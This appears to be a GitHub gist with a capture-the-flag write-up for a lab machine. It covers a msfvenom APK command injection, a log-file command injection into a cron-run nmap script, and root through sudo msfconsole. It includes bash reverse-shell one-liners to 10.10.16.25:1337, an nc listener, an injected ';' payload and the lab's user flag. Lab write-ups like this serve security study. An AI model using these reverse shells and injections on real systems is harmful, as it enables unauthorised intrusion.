Skip to content

Instantly share code, notes, and snippets.

@0xEmbo
Created Aug 13, 2021
Embed
What would you like to do?

Nmap scan

22/ssh 5000/http ![[Pasted image 20210416211309.png]]

Visiting 10.10.10.226:5000 ![[Pasted image 20210416211429.png]]

File upload in "Template file" ==> Command injection in msfvenom ==> RCE

This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x

https://www.exploit-db.com/exploits/49491

Edit exploit.py

nc -nvlp 1337
payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'

Got foothold (USER)

![[Pasted image 20210416211608.png]]

user flag: c3728a7c05e95bb566784da579a2c887

Second user

scanlosers.sh

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

app.py

POC (touch a file on /home/pwn/)

vim /home/kid/hacker
	t t 127.0.0.1; touch hhh.txt;
insert ";" into searchsploit user input
t t 127.0.0.1;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1'; >> hacker

![[Pasted image 20210416235654.png]]

ROOT

![[Pasted image 20210416235635.png]]

Ease priv esc metasploit's msfconsole allows you to execute system commands within the msfconsole sudo /opt/metasploit-framework-6.0.9/msfconsole

![[Pasted image 20210416235933.png]]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment